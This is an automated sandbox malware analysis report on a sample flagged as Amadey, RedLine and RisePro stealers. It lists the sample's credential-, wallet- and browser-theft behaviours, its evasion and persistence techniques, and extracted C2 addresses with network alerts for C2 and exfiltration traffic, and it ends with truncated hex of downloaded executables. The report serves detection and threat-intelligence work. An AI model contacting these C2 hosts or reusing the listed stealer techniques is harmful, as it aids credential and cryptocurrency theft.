Windows Analysis Report
SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe

Overview

General Information

Sample name: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe
Analysis ID: 1428500
MD5: f854143c49c4d2fa4cf73bab97ba8d3a
SHA1: 62454e89cf9b2558347e2179f49fb4a56f4762ec
SHA256: 8c8afd00e6087780e4ee0a36f170ba06f13ba6d0c46cd2119b876e88d40c24e3
Tags: Amadeyexe
Infos:

Detection

Amadey, RedLine, RisePro Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Amadeys Clipper DLL
Yara detected Amadeys stealer DLL
Yara detected RedLine Stealer
Yara detected RisePro Stealer
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Connects to many ports of the same IP (likely port scanning)
Creates multiple autostart registry keys
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Potentially malicious time measurement code found
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Uses known network protocols on non-standard ports
Uses netsh to modify the Windows network and firewall settings
Uses schtasks.exe or at.exe to add and modify task schedules
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Installs a raw input device (often for capturing keystrokes)
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet
Sigma detected: Suspicious Add Scheduled Task Parent
Sleep loop found (likely to delay execution)
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Name Description Attribution Blogpost URLs Link
RedLine Stealer RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Avira: detected
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Avira: detection malicious, Label: HEUR/AGEN.1305500
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build12[1].exe Avira: detection malicious, Label: HEUR/AGEN.1305500
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Avira: detection malicious, Label: TR/AutoIt.zstul
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\cred64[1].dll Avira: detection malicious, Label: TR/PSW.Agent.szlsq
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\amert[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\clip64[1].dll Avira: detection malicious, Label: TR/ClipBanker.tbxxw
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Avira: detection malicious, Label: HEUR/AGEN.1305500
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\cred64[1].dll Avira: detection malicious, Label: TR/PSW.Agent.szlsq
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\clip64[1].dll Avira: detection malicious, Label: TR/ClipBanker.pjgxt
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Avira: detection malicious, Label: TR/AutoIt.zstul
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Found malware configuration
Source: 52.0.build12.exe.3c0000.0.unpack Malware Configuration Extractor: RedLine {"C2 url": ["b-stamps.gl.at.ply.gg:30946"], "Bot Id": "Traffic"}
Source: rundll32.exe.3356.8.memstrmin Malware Configuration Extractor: Amadey {"C2 url": ["http://193.233.132.56/Pneh2sXQk0/index.php"]}
Multi AV Scanner detection for dropped file
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Virustotal: Detection: 50% Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\clip64[1].dll ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\clip64[1].dll Virustotal: Detection: 81% Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Virustotal: Detection: 32% Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build12[1].exe Virustotal: Detection: 77% Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\clip64[1].dll ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\clip64[1].dll Virustotal: Detection: 80% Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\cred64[1].dll ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\cred64[1].dll Virustotal: Detection: 80% Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\sarra[1].exe Virustotal: Detection: 40% Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe Virustotal: Detection: 50% Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\amert[1].exe Virustotal: Detection: 42% Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\cred64[1].dll ReversingLabs: Detection: 71%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\cred64[1].dll Virustotal: Detection: 78% Perma Link
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Virustotal: Detection: 50% Perma Link
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Virustotal: Detection: 54% Perma Link
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Virustotal: Detection: 42% Perma Link
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Virustotal: Detection: 32% Perma Link
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Virustotal: Detection: 50% Perma Link
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Virustotal: Detection: 77% Perma Link
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Virustotal: Detection: 77% Perma Link
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Virustotal: Detection: 42% Perma Link
Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll Virustotal: Detection: 80% Perma Link
Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll ReversingLabs: Detection: 71%
Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll Virustotal: Detection: 78% Perma Link
Source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll Virustotal: Detection: 81% Perma Link
Multi AV Scanner detection for submitted file
Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Virustotal: Detection: 54% Perma Link
Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe ReversingLabs: Detection: 50%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build12[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\amert[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Joe Sandbox ML: detected
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\sarra[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Joe Sandbox ML: detected
Uses 32bit PE files
Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49709 version: TLS 1.0
Source: unknown HTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49766 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.5:49767 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49776 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49777 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.5:49780 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.5:49782 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.126.29.15:443 -> 192.168.2.5:49801 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.126.29.15:443 -> 192.168.2.5:49806 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49811 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.5:49813 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49825 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.5:49827 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.126.29.15:443 -> 192.168.2.5:49840 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49874 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.5:49878 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49923 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.5:49925 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.189.173.25:443 -> 192.168.2.5:50555 version: TLS 1.2
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\Videos\desktop.ini Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\Music\desktop.ini Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\OneDrive\desktop.ini Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local Jump to behavior

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.5:49713 -> 193.233.132.56:80
Source: Traffic Snort IDS: 2856122 ETPRO TROJAN Amadey CnC Response M1 193.233.132.56:80 -> 192.168.2.5:49713
Source: Traffic Snort IDS: 2855239 ETPRO TROJAN Win32/Amadey Stealer Activity M4 (POST) 192.168.2.5:49717 -> 193.233.132.56:80
Source: Traffic Snort IDS: 2856151 ETPRO TROJAN Amadey CnC Activity M7 192.168.2.5:49718 -> 193.233.132.56:80
Source: Traffic Snort IDS: 2044696 ET TROJAN Win32/Amadey Host Fingerprint Exfil (POST) M2 192.168.2.5:49719 -> 193.233.132.56:80
Source: Traffic Snort IDS: 2044696 ET TROJAN Win32/Amadey Host Fingerprint Exfil (POST) M2 192.168.2.5:49721 -> 193.233.132.56:80
Source: Traffic Snort IDS: 2044696 ET TROJAN Win32/Amadey Host Fingerprint Exfil (POST) M2 192.168.2.5:49741 -> 193.233.132.56:80
Source: Traffic Snort IDS: 2049060 ET TROJAN RisePro TCP Heartbeat Packet 192.168.2.5:49762 -> 147.45.47.93:58709
Source: Traffic Snort IDS: 2046266 ET TROJAN [ANY.RUN] RisePro TCP (Token) 147.45.47.93:58709 -> 192.168.2.5:49762
Source: Traffic Snort IDS: 2046267 ET TROJAN [ANY.RUN] RisePro TCP (External IP) 147.45.47.93:58709 -> 192.168.2.5:49762
Source: Traffic Snort IDS: 2044696 ET TROJAN Win32/Amadey Host Fingerprint Exfil (POST) M2 192.168.2.5:49768 -> 193.233.132.56:80
Source: Traffic Snort IDS: 2046266 ET TROJAN [ANY.RUN] RisePro TCP (Token) 147.45.47.93:58709 -> 192.168.2.5:49773
Source: Traffic Snort IDS: 2046266 ET TROJAN [ANY.RUN] RisePro TCP (Token) 147.45.47.93:58709 -> 192.168.2.5:49774
Source: Traffic Snort IDS: 2046267 ET TROJAN [ANY.RUN] RisePro TCP (External IP) 147.45.47.93:58709 -> 192.168.2.5:49773
Source: Traffic Snort IDS: 2046267 ET TROJAN [ANY.RUN] RisePro TCP (External IP) 147.45.47.93:58709 -> 192.168.2.5:49774
Source: Traffic Snort IDS: 2046269 ET TROJAN [ANY.RUN] RisePro TCP (Activity) 192.168.2.5:49762 -> 147.45.47.93:58709
Source: Traffic Snort IDS: 2046269 ET TROJAN [ANY.RUN] RisePro TCP (Activity) 192.168.2.5:49773 -> 147.45.47.93:58709
Source: Traffic Snort IDS: 2046269 ET TROJAN [ANY.RUN] RisePro TCP (Activity) 192.168.2.5:49774 -> 147.45.47.93:58709
Source: Traffic Snort IDS: 2046266 ET TROJAN [ANY.RUN] RisePro TCP (Token) 147.45.47.93:58709 -> 192.168.2.5:49809
Source: Traffic Snort IDS: 2046266 ET TROJAN [ANY.RUN] RisePro TCP (Token) 147.45.47.93:58709 -> 192.168.2.5:49822
Source: Traffic Snort IDS: 2046266 ET TROJAN [ANY.RUN] RisePro TCP (Token) 147.45.47.93:58709 -> 192.168.2.5:49870
Source: Traffic Snort IDS: 2856122 ETPRO TROJAN Amadey CnC Response M1 193.233.132.167:80 -> 192.168.2.5:49869
Source: Traffic Snort IDS: 2044696 ET TROJAN Win32/Amadey Host Fingerprint Exfil (POST) M2 192.168.2.5:49880 -> 193.233.132.167:80
Source: Traffic Snort IDS: 2044696 ET TROJAN Win32/Amadey Host Fingerprint Exfil (POST) M2 192.168.2.5:49886 -> 193.233.132.167:80
Source: Traffic Snort IDS: 2856151 ETPRO TROJAN Amadey CnC Activity M7 192.168.2.5:49890 -> 193.233.132.167:80
Source: Traffic Snort IDS: 2855239 ETPRO TROJAN Win32/Amadey Stealer Activity M4 (POST) 192.168.2.5:49892 -> 193.233.132.167:80
Source: Traffic Snort IDS: 2046266 ET TROJAN [ANY.RUN] RisePro TCP (Token) 147.45.47.93:58709 -> 192.168.2.5:49918
Source: Traffic Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.5:50734 -> 193.233.132.167:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 193.233.132.56 80
Source: C:\Windows\System32\rundll32.exe Network Connect: 193.233.132.167 80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor IPs: 193.233.132.56
Source: Malware configuration extractor URLs: b-stamps.gl.at.ply.gg:30946
Connects to many ports of the same IP (likely port scanning)
Source: global traffic TCP traffic: 147.45.47.93 ports 0,5,7,8,58709,9
Source: global traffic TCP traffic: 147.185.221.19 ports 0,3,4,6,9,30946
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49883 -> 30946
Source: unknown Network traffic detected: HTTP traffic on port 49883 -> 30946
Source: unknown Network traffic detected: HTTP traffic on port 49889 -> 30946
Source: unknown Network traffic detected: HTTP traffic on port 49889 -> 30946
Source: unknown Network traffic detected: HTTP traffic on port 30946 -> 49883
Source: unknown Network traffic detected: HTTP traffic on port 30946 -> 49889
Source: unknown Network traffic detected: HTTP traffic on port 30946 -> 49883
Source: unknown Network traffic detected: HTTP traffic on port 30946 -> 49889
Source: unknown Network traffic detected: HTTP traffic on port 49883 -> 30946
Source: unknown Network traffic detected: HTTP traffic on port 49889 -> 30946
Source: unknown Network traffic detected: HTTP traffic on port 30946 -> 49889
Source: unknown Network traffic detected: HTTP traffic on port 30946 -> 49883
Source: unknown Network traffic detected: HTTP traffic on port 49997 -> 30946
Source: unknown Network traffic detected: HTTP traffic on port 49998 -> 30946
Source: unknown Network traffic detected: HTTP traffic on port 49998 -> 30946
Source: unknown Network traffic detected: HTTP traffic on port 49997 -> 30946
Source: unknown Network traffic detected: HTTP traffic on port 30946 -> 49998
Source: unknown Network traffic detected: HTTP traffic on port 30946 -> 49997
Source: unknown Network traffic detected: HTTP traffic on port 50095 -> 30946
Source: unknown Network traffic detected: HTTP traffic on port 50094 -> 30946
Source: unknown Network traffic detected: HTTP traffic on port 30946 -> 49998
Source: unknown Network traffic detected: HTTP traffic on port 30946 -> 49997
Source: unknown Network traffic detected: HTTP traffic on port 50095 -> 30946
Source: unknown Network traffic detected: HTTP traffic on port 50094 -> 30946
Source: unknown Network traffic detected: HTTP traffic on port 50462 -> 30946
Source: unknown Network traffic detected: HTTP traffic on port 50461 -> 30946
Source: unknown Network traffic detected: HTTP traffic on port 50462 -> 30946
Source: unknown Network traffic detected: HTTP traffic on port 50461 -> 30946
Source: unknown Network traffic detected: HTTP traffic on port 30946 -> 50094
Source: unknown Network traffic detected: HTTP traffic on port 30946 -> 50095
Source: unknown Network traffic detected: HTTP traffic on port 30946 -> 50094
Source: unknown Network traffic detected: HTTP traffic on port 30946 -> 50095
Source: unknown Network traffic detected: HTTP traffic on port 30946 -> 50094
Source: unknown Network traffic detected: HTTP traffic on port 30946 -> 50095
Source: unknown Network traffic detected: HTTP traffic on port 30946 -> 50094
Source: unknown Network traffic detected: HTTP traffic on port 30946 -> 50095
Source: unknown Network traffic detected: HTTP traffic on port 30946 -> 50094
Source: unknown Network traffic detected: HTTP traffic on port 30946 -> 50095
Source: unknown Network traffic detected: HTTP traffic on port 30946 -> 50094
Source: unknown Network traffic detected: HTTP traffic on port 30946 -> 50461
Source: unknown Network traffic detected: HTTP traffic on port 30946 -> 50462
Source: unknown Network traffic detected: HTTP traffic on port 30946 -> 50461
Source: unknown Network traffic detected: HTTP traffic on port 30946 -> 50462
Source: unknown Network traffic detected: HTTP traffic on port 30946 -> 50461
Source: unknown Network traffic detected: HTTP traffic on port 30946 -> 50462
Source: unknown Network traffic detected: HTTP traffic on port 50784 -> 30946
Source: unknown Network traffic detected: HTTP traffic on port 50785 -> 30946
Source: unknown Network traffic detected: HTTP traffic on port 50784 -> 30946
Source: unknown Network traffic detected: HTTP traffic on port 50785 -> 30946
Source: unknown Network traffic detected: HTTP traffic on port 30946 -> 50784
Source: unknown Network traffic detected: HTTP traffic on port 30946 -> 50785
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.5:49762 -> 147.45.47.93:58709
Source: global traffic TCP traffic: 192.168.2.5:49883 -> 147.185.221.19:30946
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 19 Apr 2024 01:29:03 GMTContent-Type: application/octet-streamContent-Length: 1285632Last-Modified: Sun, 03 Mar 2024 11:54:33 GMTConnection: keep-aliveETag: "65e464f9-139e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c6 de c9 0d 82 bf a7 5e 82 bf a7 5e 82 bf a7 5e d9 d7 a3 5f 91 bf a7 5e d9 d7 a4 5f 92 bf a7 5e d9 d7 a2 5f 32 bf a7 5e 57 d2 a2 5f c4 bf a7 5e 57 d2 a3 5f 8d bf a7 5e 57 d2 a4 5f 8b bf a7 5e d9 d7 a6 5f 8f bf a7 5e 82 bf a6 5e 43 bf a7 5e 19 d1 ae 5f 86 bf a7 5e 19 d1 a7 5f 83 bf a7 5e 19 d1 58 5e 83 bf a7 5e 19 d1 a5 5f 83 bf a7 5e 52 69 63 68 82 bf a7 5e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 69 12 e4 65 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0e 18 00 c0 0f 00 00 52 04 00 00 00 00 00 68 06 0d 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 14 00 00 04 00 00 00 00 00 00 02 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 89 12 00 58 00 00 00 78 89 12 00 8c 00 00 00 00 20 14 00 f8 00 00 00 00 60 13 00 28 ad 00 00 00 00 00 00 00 00 00 00 00 30 14 00 f4 15 00 00 b0 9e 11 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 9f 11 00 08 01 00 00 00 00 00 00 00 00 00 00 00 d0 0f 00 e8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f8 be 0f 00 00 10 00 00 00 c0 0f 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e2 cd 02 00 00 d0 0f 00 00 ce 02 00 00 c4 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 4c bb 00 00 00 a0 12 00 00 44 00 00 00 92 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 28 ad 00 00 00 60 13 00 00 ae 00 00 00 d6 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 5f 52 44 41 54 41 00 00 94 00 00 00 00 10 14 00 00 02 00 00 00 84 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 f8 00 00 00 00 20 14 00 00 02 00 00 00 86 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f4 15 00 00 00 30 14 00 00 16 00 00 00 88 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 19 Apr 2024 01:29:04 GMTContent-Type: application/octet-streamContent-Length: 1905152Last-Modified: Fri, 19 Apr 2024 00:37:12 GMTConnection: keep-aliveETag: "6621bcb8-1d1200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 2a 52 e4 13 6e 33 8a 40 6e 33 8a 40 6e 33 8a 40 35 5b 89 41 60 33 8a 40 35 5b 8f 41 f0 33 8a 40 bb 5e 8e 41 7c 33 8a 40 bb 5e 89 41 7a 33 8a 40 bb 5e 8f 41 1b 33 8a 40 35 5b 8e 41 7a 33 8a 40 35 5b 8b 41 7d 33 8a 40 6e 33 8b 40 ba 33 8a 40 f5 5d 83 41 6f 33 8a 40 f5 5d 75 40 6f 33 8a 40 f5 5d 88 41 6f 33 8a 40 52 69 63 68 6e 33 8a 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 15 bf bb 65 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 dc 04 00 00 aa 01 00 00 00 00 00 00 50 4b 